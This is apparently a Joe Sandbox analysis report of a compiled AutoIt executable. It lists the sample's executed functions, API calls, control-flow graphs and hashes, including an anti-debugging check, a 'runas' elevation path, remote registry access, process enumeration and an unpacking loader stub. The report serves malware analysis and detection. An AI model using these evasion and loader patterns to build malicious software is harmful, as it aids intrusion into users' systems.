107669->107675 107671->107631 107676 76d89e 50 API calls 107671->107676 107691 7d87e0 107673->107691 107674 7729ca 107674->107631 107681 7d8a6f 107674->107681 107682 7729e5 107674->107682 107677 7d8821 107675->107677 107676->107627 107683 76d89e 50 API calls 107677->107683 107684 7d875d 107678->107684 107685 76ca8e 48 API calls 107679->107685 107686 76d89e 50 API calls 107680->107686 107734 7bd1da 50 API calls 107681->107734 107688 78010a 48 API calls 107682->107688 107683->107647 107684->107647 107689 7714a0 48 API calls 107684->107689 107685->107631 107690 7d8a4b 107686->107690 107688->107631 107692 7d8775 107689->107692 107693 76d89e 50 API calls 107690->107693 107691->107669 107727 7aa76d 49 API calls 107691->107727 107695 76d89e 50 API calls 107692->107695 107696 7d8a57 107693->107696 107698 7d8781 107695->107698 107733 764b02 50 API calls 107696->107733 107697 7d8807 107700 76d89e 50 API calls 107697->107700 107701 76d89e 50 API calls 107698->107701 107700->107669 107701->107646 107707 7bbfd9 _memset 107702->107707 107704 7bc22e 107704->107667 107705 7bc14c 107706 7bc19f VariantInit VariantClear 107705->107706 107713 7bc033 107705->107713 107708 7bc1c5 107706->107708 107707->107705 107709 7bc097 VariantInit 107707->107709 107707->107713 107710 7bc1e6 107708->107710 107708->107713 107714 7bc0d6 107709->107714 107739 7aa6f6 103 API calls 107710->107739 107712 7bc20d VariantClear 107712->107704 107740 7bc235 415 API calls Mailbox 107713->107740 107714->107713 107738 7aa6f6 103 API calls 107714->107738 107716->107617 107717->107609 107718->107662 107719->107674 107720->107627 107721->107603 107722->107624 107723->107624 107724->107624 107725->107666 107726->107668 107727->107697 107728->107650 107729->107631 107730->107636 107731->107660 107732->107631 107733->107631 107734->107665 107735->107652 107736->107658 107737->107631 107738->107705 107739->107712 107740->107704

                                                                                                                                        Executed Functions

                                                                                                                                        Function 0076374E Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 145windowCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0076376D
                                                                                                                                          • Part of subcall function 00764257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_222.exe,00000104,?,00000000,00000001,00000000), ref: 0076428C
                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?), ref: 0076377F
                                                                                                                                        • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_222.exe,00000104,?,00821120,C:\Users\user\Desktop\._cache_222.exe,00821124,?,?), ref: 007637EE
                                                                                                                                          • Part of subcall function 007634F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0076352A
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00763860
                                                                                                                                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00812934,00000010), ref: 007D21C5
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?), ref: 007D21FD
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 007D2232
                                                                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,007FDAA4), ref: 007D2290
                                                                                                                                        • ShellExecuteW.SHELL32(00000000), ref: 007D2297
                                                                                                                                          • Part of subcall function 007630A5: GetSysColorBrush.USER32(0000000F), ref: 007630B0
                                                                                                                                          • Part of subcall function 007630A5: LoadCursorW.USER32(00000000,00007F00), ref: 007630BF
                                                                                                                                          • Part of subcall function 007630A5: LoadIconW.USER32(00000063), ref: 007630D5
                                                                                                                                          • Part of subcall function 007630A5: LoadIconW.USER32(000000A4), ref: 007630E7
                                                                                                                                          • Part of subcall function 007630A5: LoadIconW.USER32(000000A2), ref: 007630F9
                                                                                                                                          • Part of subcall function 007630A5: RegisterClassExW.USER32(?), ref: 00763167
                                                                                                                                          • Part of subcall function 00762E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00762ECB
                                                                                                                                          • Part of subcall function 00762E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00762EEC
                                                                                                                                          • Part of subcall function 00762E9D: ShowWindow.USER32(00000000), ref: 00762F00
                                                                                                                                          • Part of subcall function 00762E9D: ShowWindow.USER32(00000000), ref: 00762F09
                                                                                                                                          • Part of subcall function 00763598: _memset.LIBCMT ref: 007635BE
                                                                                                                                          • Part of subcall function 00763598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00763667
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                                        • String ID: C:\Users\user\Desktop\._cache_222.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                        • API String ID: 4253510256-3555659051
                                                                                                                                        • Opcode ID: 21dc64ec9fef616afb8891e5518d0713a6c1771a75d7bd8e936e53d263cc7840
                                                                                                                                        • Instruction ID: 064cf15ada4f9374b38e9b0b1b5b1c4a52c58900b4980e97d063ffe752f4244f
                                                                                                                                        • Opcode Fuzzy Hash: 21dc64ec9fef616afb8891e5518d0713a6c1771a75d7bd8e936e53d263cc7840
                                                                                                                                        • Instruction Fuzzy Hash: AE511970604249FACF20ABA0AC4EFED7B78FB25710F104156FA4296292D67D4A86CB31
                                                                                                                                        Function 007C30AD Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1168 7c30ad-7c315b call 76ca8e call 76d3d2 * 3 call 7684a6 call 7c3d7b call 7c3af7 1183 7c315d-7c3161 1168->1183 1184 7c3166-7c3170 1168->1184 1185 7c31e6-7c31f2 call 7ad7e4 1183->1185 1186 7c31a2 1184->1186 1187 7c3172-7c3187 RegConnectRegistryW 1184->1187 1198 7c3504-7c3527 call 765cd3 * 3 1185->1198 1188 7c31a6-7c31c3 RegOpenKeyExW 1186->1188 1190 7c319c-7c31a0 1187->1190 1191 7c3189-7c319a call 767ba9 1187->1191 1192 7c31c5-7c31d7 call 767ba9 1188->1192 1193 7c31f7-7c3227 call 7684a6 RegQueryValueExW 1188->1193 1190->1188 1191->1185 1204 7c31d9-7c31dd RegCloseKey 1192->1204 1205 7c31e3-7c31e4 1192->1205 1206 7c323e-7c3254 call 767ba9 1193->1206 1207 7c3229-7c3239 call 767ba9 1193->1207 1204->1205 1205->1185 1215 7c34dc-7c34dd 1206->1215 1216 7c325a-7c325f 1206->1216 1214 7c34df-7c34e6 call 7ad7e4 1207->1214 1222 7c34eb-7c34fc RegCloseKey 1214->1222 1215->1214 1219 7c344c-7c3498 call 78010a call 7684a6 RegQueryValueExW 1216->1219 1220 7c3265-7c3268 1216->1220 1243 7c349a-7c34a6 1219->1243 1244 7c34b4-7c34ce call 767ba9 call 7ad7e4 1219->1244 1223 7c326e-7c3273 1220->1223 1224 7c33d9-7c3411 call 7aad14 call 7684a6 RegQueryValueExW 1220->1224 1222->1198 1227 7c34fe-7c3502 RegCloseKey 1222->1227 1229 7c338d-7c33d4 call 7684a6 RegQueryValueExW call 772570 1223->1229 1230 7c3279-7c327c 1223->1230 1224->1222 1250 7c3417-7c3447 call 767ba9 call 7ad7e4 call 772570 1224->1250 1227->1198 1229->1222 1233 7c32de-7c332b call 78010a call 7684a6 RegQueryValueExW 1230->1233 1234 7c327e-7c3281 1230->1234 1233->1244 1258 7c3331-7c3348 1233->1258 1234->1215 1239 7c3287-7c32d9 call 7684a6 RegQueryValueExW call 772570 1234->1239 1239->1222 1249 7c34aa-7c34b2 call 76ca8e 1243->1249 1264 7c34d3-7c34da call 78017e 1244->1264 1249->1264 1250->1222 1258->1249 1263 7c334e-7c3355 1258->1263 1266 7c335c-7c3361 1263->1266 1267 7c3357-7c3358 1263->1267 1264->1222 1270 7c3376-7c337b 1266->1270 1271 7c3363-7c3367 1266->1271 1267->1266 1270->1249 1276 7c3381-7c3388 1270->1276 1274 7c3369-7c336d 1271->1274 1275 7c3371-7c3374 1271->1275 1274->1275 1275->1270 1275->1271 1276->1249
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007C3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C2AA6,?,?), ref: 007C3B0E
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C317F
                                                                                                                                          • Part of subcall function 007684A6: __swprintf.LIBCMT ref: 007684E5
                                                                                                                                          • Part of subcall function 007684A6: __itow.LIBCMT ref: 00768519
                                                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 007C321E
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007C32B6
                                                                                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007C34F5
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 007C3502
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1240663315-0
                                                                                                                                        • Opcode ID: fc71093ed0729ada6677178ce39d0bfdcbcf36c6725fb17b8294d8ab6da3bcbe
                                                                                                                                        • Instruction ID: 3ec5bc24fa07ad786eb6a04ad227af2d6c14af99d7d1712891f89855410f2e4a
                                                                                                                                        • Opcode Fuzzy Hash: fc71093ed0729ada6677178ce39d0bfdcbcf36c6725fb17b8294d8ab6da3bcbe
                                                                                                                                        • Instruction Fuzzy Hash: 97E14C71204210EFCB15DF28C995E2ABBE9EF89314B04C55DF84ADB261DB39EE05CB52
                                                                                                                                        Function 007629C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1278 7629c2-7629e2 1280 7629e4-7629e7 1278->1280 1281 762a42-762a44 1278->1281 1282 762a48 1280->1282 1283 7629e9-7629f0 1280->1283 1281->1280 1284 762a46 1281->1284 1288 762a4e-762a51 1282->1288 1289 7d2307-7d2335 call 76322e call 77ec33 1282->1289 1285 7629f6-7629fb 1283->1285 1286 762aac-762ab4 PostQuitMessage 1283->1286 1287 762a2b-762a33 NtdllDefWindowProc_W 1284->1287 1291 7d238f-7d23a3 call 7a57fb 1285->1291 1292 762a01-762a03 1285->1292 1293 762a72-762a74 1286->1293 1294 762a39-762a3f 1287->1294 1295 762a76-762a9d SetTimer RegisterClipboardFormatW 1288->1295 1296 762a53-762a54 1288->1296 1323 7d233a-7d2341 1289->1323 1291->1293 1316 7d23a9 1291->1316 1298 762ab6-762ac0 call 761e58 1292->1298 1299 762a09-762a0e 1292->1299 1293->1294 1295->1293 1300 762a9f-762aaa CreatePopupMenu 1295->1300 1302 7d22aa-7d22ad 1296->1302 1303 762a5a-762a6d KillTimer call 762b94 call 762ac7 1296->1303 1317 762ac5 1298->1317 1305 762a14-762a19 1299->1305 1306 7d2374-7d237b 1299->1306 1300->1293 1309 7d22af-7d22b1 1302->1309 1310 7d22e3-7d2302 MoveWindow 1302->1310 1303->1293 1314 7d235f-7d236f call 7a5fdb 1305->1314 1315 762a1f-762a25 1305->1315 1306->1287 1312 7d2381-7d238a call 79b31f 1306->1312 1318 7d22b3-7d22b6 1309->1318 1319 7d22d2-7d22de SetFocus 1309->1319 1310->1293 1312->1287 1314->1293 1315->1287 1315->1323 1316->1287 1317->1293 1318->1315 1324 7d22bc-7d22cd call 76322e 1318->1324 1319->1293 1323->1287 1327 7d2347-7d235a call 762b94 call 763598 1323->1327 1324->1293 1327->1287
                                                                                                                                        APIs
                                                                                                                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00762A33
                                                                                                                                        • KillTimer.USER32(?,00000001), ref: 00762A5D
                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00762A80
                                                                                                                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00762A8B
                                                                                                                                        • CreatePopupMenu.USER32 ref: 00762A9F
                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00762AAE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                                                                                        • String ID: TaskbarCreated
                                                                                                                                        • API String ID: 157504867-2362178303
                                                                                                                                        • Opcode ID: d5e38e241796a78760278a0b80265f54cd70745fd25dedeaaf7b5766f6800c42
                                                                                                                                        • Instruction ID: e25a0347e05c1582cbb8378124d9590f202b9b2aba89c18a948da129b72d4357
                                                                                                                                        • Opcode Fuzzy Hash: d5e38e241796a78760278a0b80265f54cd70745fd25dedeaaf7b5766f6800c42
                                                                                                                                        • Instruction Fuzzy Hash: 34413731210A45ABDF74AFA4AC4DBB93655F738340F54C226FD03E62A3DAAC9C438765
                                                                                                                                        Function 0077E47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetVersionExW.KERNEL32(?,00000000), ref: 0077E4A7
                                                                                                                                          • Part of subcall function 00767E53: _memmove.LIBCMT ref: 00767EB9
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,007FDC28,?,?), ref: 0077E567
                                                                                                                                        • GetNativeSystemInfo.KERNEL32(?,007FDC28,?,?), ref: 0077E5BC
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0077E5C7
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0077E5DA
                                                                                                                                        • GetSystemInfo.KERNEL32(?,007FDC28,?,?), ref: 0077E5E4
                                                                                                                                        • GetSystemInfo.KERNEL32(?,007FDC28,?,?), ref: 0077E5F0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2717633055-0
                                                                                                                                        • Opcode ID: e0374f83084cb9aa70e7996e1f0158e9a55eb3ce6c6f4c0f5ec1b87c46f7966b
                                                                                                                                        • Instruction ID: 0764fbe412194dcc0cb1268afa1056cd3ae2665cb5c11e589dae43dafb481ca3
                                                                                                                                        • Opcode Fuzzy Hash: e0374f83084cb9aa70e7996e1f0158e9a55eb3ce6c6f4c0f5ec1b87c46f7966b
                                                                                                                                        • Instruction Fuzzy Hash: 6B6182B180A2C8CBCF15CF6898C11E97F746F2A304F2985D9D8499F34BD628C959CB65
                                                                                                                                        Function 007631F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00763202
                                                                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00763219
                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 007D57D7
                                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 007D57EC
                                                                                                                                        • LockResource.KERNEL32(?), ref: 007D57FF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                        • String ID: SCRIPT
                                                                                                                                        • API String ID: 3051347437-3967369404
                                                                                                                                        • Opcode ID: a9613145145f72e29903a838435038a708b325b77798b2be764f9ec05bfbb2f1
                                                                                                                                        • Instruction ID: d82050b34ff1867fc604c5b16671e5eee887a71459597a49171acf10cbd035d8
                                                                                                                                        • Opcode Fuzzy Hash: a9613145145f72e29903a838435038a708b325b77798b2be764f9ec05bfbb2f1
                                                                                                                                        • Instruction Fuzzy Hash: B3117970200701BFE7218B65EC88F277BBDFBC9B51F208029B9128A290DB75DD10CA60
                                                                                                                                        Function 007A6F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007A6F7D
                                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 007A6F8D
                                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 007A6FAC
                                                                                                                                        • __wsplitpath.LIBCMT ref: 007A6FD0
                                                                                                                                        • _wcscat.LIBCMT ref: 007A6FE3
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 007A7022
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1605983538-0
                                                                                                                                        • Opcode ID: 99f37bcdb3a94c184fa9b72c3e565172f3891076df9d095614c150e9d9a189bb
                                                                                                                                        • Instruction ID: ce5a53b6b90b29782e1556b5890cd51e6191b2cbd317d3e76aaa02729544479c
                                                                                                                                        • Opcode Fuzzy Hash: 99f37bcdb3a94c184fa9b72c3e565172f3891076df9d095614c150e9d9a189bb
                                                                                                                                        • Instruction Fuzzy Hash: 60216571904258EFDB20ABA0CC88BEEB7BCAB49300F5005A5F505E7141E7799F85CB60
                                                                                                                                        Function 008CB0C0 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 008CB1FA
                                                                                                                                        • GetProcAddress.KERNEL32(?,008C4FF9), ref: 008CB218
                                                                                                                                        • ExitProcess.KERNEL32(?,008C4FF9), ref: 008CB229
                                                                                                                                        • VirtualProtect.KERNEL32(00760000,00001000,00000004,?,00000000), ref: 008CB277
                                                                                                                                        • VirtualProtect.KERNEL32(00760000,00001000), ref: 008CB28C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1996367037-0
                                                                                                                                        • Opcode ID: 807c809fc88a6ccbbdab32305151c36bf599dcc26e347a95fe2bf3a8bc013d28
                                                                                                                                        • Instruction ID: ddc17b5248c17b3051ad0e335658ff60143bf324d608e1dd325ad813028263f4
                                                                                                                                        • Opcode Fuzzy Hash: 807c809fc88a6ccbbdab32305151c36bf599dcc26e347a95fe2bf3a8bc013d28
                                                                                                                                        • Instruction Fuzzy Hash: 0251E472A44A565AD7208AB8DCD2B65B7B4FB11324F2C073ED5E2C73C5E7B098098760
                                                                                                                                        Function 007AEFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007A78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 007A78CB
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 007AF04D
                                                                                                                                        • CoCreateInstance.COMBASE(007EDA7C,00000000,00000001,007ED8EC,?), ref: 007AF066
                                                                                                                                        • CoUninitialize.COMBASE ref: 007AF083
                                                                                                                                          • Part of subcall function 007684A6: __swprintf.LIBCMT ref: 007684E5
                                                                                                                                          • Part of subcall function 007684A6: __itow.LIBCMT ref: 00768519
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                        • String ID: .lnk
                                                                                                                                        • API String ID: 2126378814-24824748
                                                                                                                                        • Opcode ID: 99a237ceabeafbf4df9eacbc9d29e88efc9b2518b0ee08472d75ab399bb32352
                                                                                                                                        • Instruction ID: 7960f3a5fc17c7ff3dd2b5a2880a449b115846ed7bf64ca1e3f62630ad3ea1da
                                                                                                                                        • Opcode Fuzzy Hash: 99a237ceabeafbf4df9eacbc9d29e88efc9b2518b0ee08472d75ab399bb32352
                                                                                                                                        • Instruction Fuzzy Hash: F8A13575604301DFCB10DF54C884D5ABBE5BF89320F148A98F99A9B3A1CB39ED45CB91
                                                                                                                                        Function 0076DCD0 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 540COMMON
